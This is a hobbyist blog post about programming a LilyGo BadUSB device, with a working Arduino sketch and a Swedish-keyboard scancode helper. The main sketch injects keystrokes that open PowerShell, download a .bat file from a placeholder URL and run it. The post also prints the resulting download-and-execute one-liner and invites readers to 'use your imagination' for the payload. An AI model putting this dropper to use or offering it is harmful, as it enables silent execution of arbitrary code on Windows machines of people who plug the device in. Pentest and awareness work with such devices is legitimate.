LilyGo BadUSB – project

I have to post this to myself just to get it all together…

So i just got my Lilygo Bad USB going. It was quit a hassle to get commands and special characters working, but now it does.

So the LilyGo USB key is actually an Arduino Leonardo card that can act as a keyboard. Its a tool i guess that can be found in many pentesters backpack.

My LilyGO does the magic of downloading a script, and then run it. I just put together a batchfile that in its turn downloads a couple of files, creates a file, and generally spits out a bunch of garbage to show why not to plug any USB key into your computer. it works on at least win7 and win10.

So what you need to do when you get your LiliGO BadUSB is to install arduiono IDE to program it. Dowload it from https://www.arduino.cc/en/software … The setup is pretty straightforward. Hit the Tool menu an make sure you select card as ”Arduiono Leonardo” and that the port is right.

When all that is set and done, my sketch for my LilyGo is as follow:

#include "Keyboard.h"
 
void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}
 
/* Init function */
void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();
 
      delay(2000);
      
         // Press the GUI-key, or the windows-key... same thing.
            Keyboard.press(KEY_LEFT_GUI);Keyboard.press('r');Keyboard.releaseAll();
            delay(500);
         // printing powershell into the runbox
            Keyboard.print("powershell");
            delay(100);
            typeKey(KEY_RETURN);
         // DOWNLOADING ...
            delay(1000);
            Keyboard.press(KEY_LEFT_SHIFT);Keyboard.print("8");Keyboard.releaseAll();
              Keyboard.print("New/Object System.Net.WebClient");
            Keyboard.press(KEY_LEFT_SHIFT);Keyboard.print("9");Keyboard.releaseAll();
            Keyboard.print(".DownloadFile");
            Keyboard.press(KEY_LEFT_SHIFT);Keyboard.print("8");Keyboard.releaseAll();
            Keyboard.press(0xBA);Keyboard.releaseAll();
            Keyboard.print("http");Keyboard.press(KEY_LEFT_SHIFT);Keyboard.print(".");Keyboard.releaseAll();Keyboard.press(KEY_LEFT_SHIFT);Keyboard.print("77");Keyboard.releaseAll();Keyboard.print("your.own.url.com");Keyboard.press(KEY_LEFT_SHIFT);Keyboard.print("7");Keyboard.releaseAll();Keyboard.print("cia.bat");Keyboard.press(0xBA);Keyboard.releaseAll();Keyboard.print(", ");
            Keyboard.press(0xBA);Keyboard.releaseAll();Keyboard.print("cia.bat");Keyboard.press(0xBA);Keyboard.releaseAll();Keyboard.press(KEY_LEFT_SHIFT);Keyboard.print("9");Keyboard.releaseAll();
            typeKey(KEY_RETURN);

        // Giving the download process 3 seconds
              delay(3000);

        // Running the downloaded .bat file      
              Keyboard.print(".");
   Keyboard.press(KEY_RIGHT_ALT);Keyboard.print("-");Keyboard.releaseAll();
              Keyboard.print("cia.bat");
              typeKey(KEY_RETURN);
              
  // Ending stream
  Keyboard.end();
}
 
/* Unused endless loop */
void loop() {}

Yes, its not cleaned up but it works and it is not hard to understand…. Keep reading !

it produces the following when put in a swedish windows PC:

rpowershell
(New-Object System.Net.WebClient).DownloadFile(’http://your.own.url.com/cia.bat’, ’cia.bat’)
.\cia.bat

The ’r’ before powershell is the pushing of the windows-key, and then it prints powershell, hits enter types the command in, andThats it.

The only thing it does, is downloading and running my .bat file from the internet. Its from the .bat file the show begins. Just use your imagination 😉

The hard parts was to find the special characters . Im working on a Swedish keyboard and the arduiono IDE is only working with US keyboard, and the info on getting shit to work in ”my case swedish” was hard to find.

When you start to get hang of things, how to program your LilyGo with the IDE software, and you realize you are ’up shit creek’ because you dont have US keyboard. Dont give up !

Here is a snippet of code to run on your LilyGo to get all the available characters for your keyboard. It has a 7 second delay before it starts, just so you get time to switch to your notepad or whatever texteditor you are using.

#include "Keyboard.h"

void setup() {
  Keyboard.begin();
  delay(7000);   // to get you some time to switch to your editor

  Keyboard.print("start");
  Keyboard.write(KEY_RETURN);

  for (int i = 0x04; i < 0x38; i++) {
    int j = i + 0x88;
    Keyboard.print("0x");
    Keyboard.print(j, HEX);
    Keyboard.print(" ");
    Keyboard.write(j);

    Keyboard.print("  ");
    
    Keyboard.press(KEY_LEFT_SHIFT);
    Keyboard.write(j);
    Keyboard.releaseAll();

    Keyboard.write(KEY_RETURN);
  }
  Keyboard.print("end");
}

void loop() {
}

For example the last character i was looking for was the ’ – single quote.

And the code to send the character ’

Keyboard.press(0xBA);Keyboard.releaseAll();

Just paste it in your IDE sofware and run it on Notepad or some texteditor to get scancodes for your keyboard…

Thats it for tonight….

Lämna ett svar

Din e-postadress kommer inte att publiceras.Obligatoriska fält är märkta *

Stäng